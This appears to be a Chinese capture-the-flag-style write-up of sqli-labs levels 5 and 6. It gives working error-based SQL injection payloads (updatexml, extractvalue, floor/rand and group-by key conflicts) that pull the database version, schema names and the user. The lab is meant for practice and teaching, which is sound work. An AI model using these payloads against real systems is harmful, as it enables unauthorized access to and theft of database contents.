sqli-labs第五,六题

第五题

sqli-labs第五,六题

 

 1.根据提示,输入id参数

sqli-labs第五,六题

 在正确id范围内,改变id页面相同

sqli-labs第五,六题

 

 2.老规矩,单引号伺候

sqli-labs第五,六题

单引号触发错误

猜测sql语句为:"SELECT * FROM table_name WHERE id=‘$id‘ LIMIT 0,1"

 

3.注入布尔表达式,观察页面变化

sqli-labs第五,六题

sqli-labs第五,六题

注入永假式页面无返回值,确认存在注入漏洞

 

4.因为页面并不直接显示查询结果,所以选择报错注入或布尔盲注进行攻击(延时注入亦可),这里使用报错注入

(1)通过updatexml函数,执行SQL语句

  ?id=1‘ and updatexml(1,(concat(0x7c,(select @@version))),1) --+

  爆出数据库版本信息

sqli-labs第五,六题

   查询元数据

  ?id=1‘ and updatexml(1,concat(0x7c,(select group_concat(schema_name) from information_schema.schemata)),1)--+

sqli-labs第五,六题

  updatexml返回的字符串长度有限 32字节

  可以使用LIMIT对元数据进行枚举

  ?id=1‘ and updatexml(1,concat(0x7c,(select schema_name from information_schema.schemata LIMIT 0,1)),1)--+

sqli-labs第五,六题

sqli-labs第五,六题

  。。。。。。

(2)通过extractvalue函数,执行SQL语句

  用法与updatexml类似,返回字符串长度也同样只有32字节

  ?id=1‘ and extractvalue(1,concat(0x7c,(select schema_name from information_schema.schemata LIMIT 0,1)))--+

sqli-labs第五,六题

 

 (3)通过floor函数,执行SQL语句

  ?id=1‘ union select * from (select NULL, count(*),concat(floor(rand(0)*2),(select user())) a from information_schema.tables group by a)b--+

sqli-labs第五,六题

 

 (4)通过group by重复键冲突,进行报错注入

  ?id=1‘ union select NULL,concat(left(rand(),3),‘^‘,(select version()),‘^‘)a,count(*) from information_schema.tables group by a --+

sqli-labs第五,六题

 

 

 

第六题

与第五题类似将单引号换为双引号即可。

sqli-labs第五,六题

上一篇:mysql导出表结构到excel


下一篇:在Access中使用SQL语句对数据进行批量更新